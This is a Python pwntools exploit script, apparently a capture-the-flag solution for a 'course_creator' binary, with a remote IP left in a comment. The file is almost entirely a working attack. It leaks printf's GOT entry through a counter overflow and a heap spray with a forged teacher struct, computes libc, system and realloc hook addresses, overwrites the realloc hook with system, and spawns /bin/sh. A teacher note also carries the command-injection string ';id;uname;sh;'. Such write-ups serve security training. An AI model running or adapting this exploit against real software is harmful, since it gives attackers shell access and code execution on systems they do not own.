import time
from pwn import *
context(arch = 'i386', os = 'linux')

#class R(remote):
class R(process):
    def __init__(self,*a,**kw):
        super(R,self).__init__(*a,**kw)
        self.cc = 0
        self.tc = 0
        
    def menu(self):
        self.recvuntil('do?\n')
      
    def send_number(self,n):
        self.send(str(n)+' ')
        self.recvuntil('>> ')  
#        self.recvline()
        
    def cmd(self,idx):
        self.menu()
        self.send_number(idx)

        
    def _edit_teacher(self,name,age,note=None):
        self.recvuntil('What\'s the name of teacher')
        self.sendline(name)
        self.recvuntil('?')
        self.send_number(age)
        self.recvuntil('y/n\n')
        if note:
            self.sendline('y')
            self.recvuntil('say about')
            self.sendline(note)
        else:
            self.sendline('n')
            
    def add_teachers(self,tcdata,count=None):
        self.cmd(1)
        r.recvuntil('?')
        r.send_number(count if count else len(tcdata))
        for t in tcdata:
            self._edit_teacher(*t)
        self.tc += len(tcdata)
        
    def edit_teacher(self,tid,name,age,note=None):
        self.cmd(4)
        self.recvuntil('edit.')
        self.sendline(str(tid))
        self._edit_teacher(name,age,note)
            
    def add_course(self,title,tid,summary,desc,desclen=None,do_edit=False,send_title=False):

        def new_desc():
            
            self.recvuntil('e?')
            if not do_edit or send_title:
               self.sendline(title)
            self.recvuntil('?')
            self.send_number(tid)
            self.recvuntil('?')
            self.sendline(summary)
        
        self.cmd(2)
        if  self.recvn(1) == 'T':
            self.recvuntil('y/n\n')
            self.sendline('y' if do_edit else 'n')
            if do_edit: new_desc()
        else:
            new_desc()
            
        self.recvuntil('?')
        self.sendline(str(desclen if type(desclen)==int else len(desc)))
        self.recvuntil(':')
        self.sendline(desc)
        self.cc  +=1

    def list_courses(self):
        self.cmd(5)
        self.recvuntil(':')
        for _ in range(self.cc%256):
            self.recvuntil('Title: ')
            title=self.recvline().strip()
            self.recvuntil('Summary: ')
            summ = self.recvline().strip()
            self.recvuntil('TeacherID: ')
            tid = int(self.recvline().strip())
            self.recvuntil('Description: ')
            desc=self.recvline().strip()
            print title,summ,tid,desc

    def _get_teacher(self):
        self.recvuntil('Teacher ')
        tich=int(self.recvline().strip()[:-1])
        self.recvuntil('Name: ')
        name = self.recvline().strip()
        self.recvuntil('Age: ')
        age = int(self.recvline().strip())
        self.recvuntil('Note: ')
        note=self.recvline().strip()
        return tich,name,age,note
        
            
    def list_teachers(self,tid='all'):
        self.cmd(3)
        self.recvuntil('all.')
        self.sendline(str(tid))
        r=[]
        if tid == 'all':
            for _ in range(self.tc):
                r.append(self._get_teacher())
        else:
            r.append(self._get_teacher())
        return r

def leak(r):
    fake_teacher = p32(elf.got['printf']) + p32(1337) + "dupa"
    r.add_teachers([])#,count=-1)  #//first_tich)
    ## spam some memory
    print '[*] spamming...',
    for i in range(194):
#        print '[%d] spamming'%i
        r.add_course('PWN101',4294967295,'A'*128,'E'*0x10,desclen=0x15000)
    print 'done.'
    r.add_course('PWN102',0x41424344,'B'*128,'C'*256,desclen=0xf100,do_edit=True)
    r.add_course('PWN103',0x41424344,'D'*128,'X'*0x40 + fake_teacher,do_edit=True)
    printf_a=r.list_teachers(1)[0][1][:4]
    return u32(printf_a)

    
#r = R('149.13.33.84',1520)
r = R('/tmp/course_creator_cdc4c575f7bf08f82d0536c17e2f7b47')
elf= ELF('/tmp/course_creator_cdc4c575f7bf08f82d0536c17e2f7b47')
#print hex(elf.got['printf'])

# i=0
size = 0x80000000;
allocs=[2147483647/2,2147483647/2,1073741824,536870912,134217728,67108864,67108864,33554432,33554432,16777216,8388608,8388608]
print '[*] spamming',
for s in allocs:
    print '.',
    r.add_course('PWN101',1,'x','x',desclen=s)
print
r.add_teachers([('asdf',0x41414141,';id;uname;sh;')])
r.add_teachers([],count=65534)
##112 to moj zepsuty uczyciel
#raw_input('dbg')
while r.cc != 255:
    r.add_course('PWN102',1,'a','x')    
print r.cc
r.add_course('PWN102',10,'','x',do_edit=True)
r.add_course('A'*0x48 + p32(elf.got['printf']),1,'','x')#,do_edit=True)
xx=r.list_teachers('113')[0]
#print xx
pa=u32(xx[1][:4])
print '[*] printf',hex(pa)
# libc = pa -  0x004CC40 #0x49450 #
# rehook = libc + 0x1a7404#0x01B6764#
# system = libc + 0x03FCD0# 0x3aeb0 # remote:
libc = pa -   0x49450 #
rehook = libc + 0x01B6764#
system = libc + 0x3aeb0 # remote: 

if libc &0xfff != 0:
    exit(1)
    
print '[*] libc',hex(libc)
print '[*] system', hex(system)
print '[*] realloc hook',hex(rehook)
print '[*] rewinding'
while r.cc%256 != 0:
    r.add_course('PWN102',1,'a','x')    
print r.cc
r.add_course('/bin/sh;'+'A'*0x40 + p32(rehook),1,'','x')#,do_edit=True)
r.edit_teacher(113,p32(system),1,'x')
raw_input('dbg')
r.add_teachers([])
r.interactive()